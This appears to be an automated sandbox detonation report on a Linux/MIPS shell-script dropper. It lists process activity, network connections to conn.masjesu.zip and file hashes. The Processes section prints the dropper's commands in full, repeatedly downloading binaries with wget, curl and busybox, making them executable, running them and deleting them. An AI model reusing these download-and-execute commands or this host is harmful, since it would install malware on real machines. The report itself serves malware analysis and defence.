| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:11
Platform
debian9-mipsel-20240611-en
Max time kernel
150s
Max time network
56s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | N/A |
| N/A | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | N/A |
| N/A | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | N/A |
| N/A | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | N/A |
| N/A | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | N/A |
| N/A | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | N/A |
| N/A | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | N/A |
| N/A | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | N/A |
| N/A | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | N/A |
| N/A | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | N/A |
| N/A | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | N/A |
| N/A | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/chmod
[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/rm
[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/chmod
[chmod 777 Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/tmp/Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE
[./Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/bin/rm
[rm Ukih2QCou2Bv2MiSeDYbJGnFUPtZA45aKE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/chmod
[chmod 777 eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/tmp/eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ
[./eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/bin/rm
[rm eUBxrY5VHMCCk9EGNgKSMCoNXHYHQEE6PQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/chmod
[chmod 777 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/tmp/6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik
[./6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/bin/rm
[rm 6C6vkRTxj30mARZsdGPnPAoIUz2I2uJ4Ik]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/chmod
[chmod 777 WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/tmp/WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq
[./WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/bin/rm
[rm WoLIUlBg806gX5DEGrIDeILtPvI7zIJcpq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/chmod
[chmod 777 bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/tmp/bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN
[./bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/bin/rm
[rm bCwfYiSWdnPM8nF9QCNQFauUupVa11ocfN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/chmod
[chmod 777 yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/tmp/yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc
[./yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/bin/rm
[rm yhuFpgnqmroDbPC5o9RCJieYW1CFOnQDYc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/chmod
[chmod 777 SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/tmp/SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX
[./SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/bin/rm
[rm SfInoCDmB6zQx1NlaBv6CjHcnO0lcJ3wNX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/chmod
[chmod 777 ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/tmp/ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5
[./ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/bin/rm
[rm ELfm8a3wKCyvHLOz2xFrbBioqCoX4SPqt5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/chmod
[chmod 777 ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/tmp/ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm
[./ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/bin/rm
[rm ReS1F25hvGPCIW4ckz6bbIqnItZmdnBSxm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/chmod
[chmod 777 zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/tmp/zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f
[./zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/bin/rm
[rm zBNGtXGLlgbJyNUkNvVPIaQkCscHKUnS2f]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/chmod
[chmod 777 nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/tmp/nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD
[./nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/bin/rm
[rm nHQ7bZHL7csrB6Ps3rFIYrulC4l3OPemLD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/asIYHC8adseWEP5b4sxsU9yXJskkGiXN3y]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |